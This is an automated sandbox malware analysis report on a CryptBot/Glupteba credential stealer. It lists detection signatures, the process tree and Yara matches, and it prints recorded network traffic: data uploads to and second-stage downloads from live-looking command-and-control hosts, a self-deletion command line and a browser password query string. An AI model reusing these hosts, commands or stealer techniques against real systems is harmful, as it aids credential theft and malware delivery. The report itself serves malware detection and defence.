Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.24453.7436

Overview

General Information

Sample Name:SecuriteInfo.com.W32.AIDetect.malware1.24453.7436 (renamed file extension from 7436 to exe)
Analysis ID:385467
MD5:5e3189812e802c0fd68ce592cb1e1999
SHA1:38552111d3001f4998ab85408601873897653360
SHA256:f42553b4409992bbddc1df8b716596727762a191055cd2eebb3ced648cf5384f
Tags:CryptBot
Infos:

Most interesting Screenshot:

Detection

Cryptbot Glupteba
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Yara detected Glupteba
Contains functionality to register a low level keyboard hook
Delayed program exit found
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.W32.AIDetect.malware1.24453.exe (PID: 5964 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' MD5: 5E3189812E802C0FD68CE592CB1E1999)
    • Murano.exe (PID: 5520 cmdline: 'C:\Users\user\AppData\Local\Temp\Murano.exe' MD5: AFF6F8C7521796D3BC8FC1059DBE2409)
      • 4.exe (PID: 2876 cmdline: C:\Users\user\AppData\Local\Temp\New Feature\4.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)
        • SmartClock.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)
      • vpn.exe (PID: 4324 cmdline: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe MD5: 0FDA9A85AEDF1487A6D58E4031F72E2D)
        • makecab.exe (PID: 984 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 3620 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 5292 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 6728 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 5240 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 5652 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 5696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • makecab.exe (PID: 4660 cmdline: 'C:\Windows\System32\makecab.exe' MD5: D0D74264402D9F402615F22258330EC8)
          • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5492 cmdline: 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6020 cmdline: 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4188 cmdline: timeout 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • SmartClock.exe (PID: 6884 cmdline: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe MD5: E99CED09C77FFEC9F09B33642E9B0E99)
  • SmartClock.exe (PID: 5368 cmdline: 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe' MD5: E99CED09C77FFEC9F09B33642E9B0E99)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
    • 0xc6fc8:$string1: SELECT origin_url, username_value, password_value FROM logins
    • 0xcfc04:$string2: API call with %s database connection pointer
    • 0xd07e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
    00000000.00000002.383574469.0000000005B00000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmpOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
        • 0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins
        • 0xce604:$string2: API call with %s database connection pointer
        • 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
          • 0xc59c8:$string1: SELECT origin_url, username_value, password_value FROM logins
          • 0xce604:$string2: API call with %s database connection pointer
          • 0xcf1e0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
          0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpackOlympicDestroyer_1OlympicDestroyer Payloadkevoreilly
            • 0xc43c8:$string1: SELECT origin_url, username_value, password_value FROM logins
            • 0xcd004:$string2: API call with %s database connection pointer
            • 0xcdbe0:$string3: os_win.c:%d: (%lu) %s(%s) - %s
            0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for domain / URLShow sources
              Source: awumad01.topVirustotal: Detection: 7%Perma Link
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exeReversingLabs: Detection: 31%
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeReversingLabs: Detection: 37%
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeReversingLabs: Detection: 14%
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeReversingLabs: Detection: 37%
              Multi AV Scanner detection for submitted fileShow sources
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeVirustotal: Detection: 30%Perma Link
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeReversingLabs: Detection: 33%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00401270 GetFileAttributesW,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040410E CryptUnprotectData,CryptUnprotectData,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040426D CryptUnprotectData,CryptUnprotectData,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00401470 CryptUnprotectData,LocalFree,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00404400 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,CryptUnprotectData,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040365A ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00403600 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CryptUnprotectData,

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeUnpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeUnpacked PE file: 16.2.4.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeUnpacked PE file: 33.2.SmartClock.exe.400000.0.unpack
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00414650 ExpandEnvironmentStringsW,FindFirstFileW,FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0041469B FindFirstFileW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00416AC0 FindFirstFileW,FindFirstFileW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_00416C3A CopyFileW,ExpandEnvironmentStringsW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040F259 FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406301 FindFirstFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\Murano.exeCode function: 13_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exeCode function: 16_2_03F5F89C FindFirstFileExW,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00403117 FindFirstFileW,FindClose,SetLastError,CompareFileTime,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00408FA7 ??2@YAPAXI@Z,FindFirstFileW,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00402A0B FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,
              Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exeCode function: 18_2_00402B28 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 22_2_05A0F89C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_0040F64C FindFirstFileExW,
              Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exeCode function: 25_2_059DF89C FindFirstFileExW,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk\files_
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeFile opened: C:\Users\user\AppData\Local
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 13:12:19 GMTServer: Apache/2.2.22 (@RELEASE@)Last-Modified: Mon, 12 Apr 2021 02:46:58 GMTETag: "320648-132ebb-5bfbd8703eb96"Accept-Ranges: bytesContent-Length: 1257147Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 e0 16 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 16 00 e8 c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 0e 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e8 c9 00 00 00 00 16 00 00 ca 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 d0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------pwDccphxPeFIadjUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: mardeq01.topContent-Length: 67223Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
              Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exeCode function: 0_2_0040C561 Sleep,Sleep,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,ExitProcess,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,ShellExecuteW,ExitProcess,
              Source: global trafficHTTP traffic detected: GET /download.php?file=lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /downfiles/lv.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: awumad01.topConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: aufsvg12.top
              Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------jmACsrpgBVBRjTxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Host: aufsvg12.topContent-Length: 67238Cache-Control: no-cache
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmpString found in binary or memory: http://aufsvg12.top/index.php
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmpString found in binary or memory: http://aufsvg12.top/index.php)
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmpString found in binary or memory: http://aufsvg12.top/index.phpz
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383529704.0000000004207000.00000004.00000001.sdmpString found in binary or memory: http://awumad01.top/downfiles/lv.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383709949.0000000005C16000.00000004.00000001.sdmpString found in binary or memory: http://awumad01.top/downfiles/lv.exeaC:
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmpString found in binary or memory: http://awumad01.top/download.php?file=lv.exe
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://awumad01.top/download.php?file=lv.exeopenBOOLEANBIT
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000003.377076214.0000000005C65000.00000004.00000001.sdmpString found in binary or memory: http://awumad01.top/download.php?file=lv.exeqEaRrk
              Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383766722.0000000005C63000.00000004.00000001.sdmpString found in binary or memory: http://awumad01.top/download.php?file=lv.exeskQ
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: vpn.exe, 00000012.00000003.387455284.0000000003C76000.00000004.00000001.sdmp, Notti.eps.18.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: Murano.exe, 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp, vpn.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
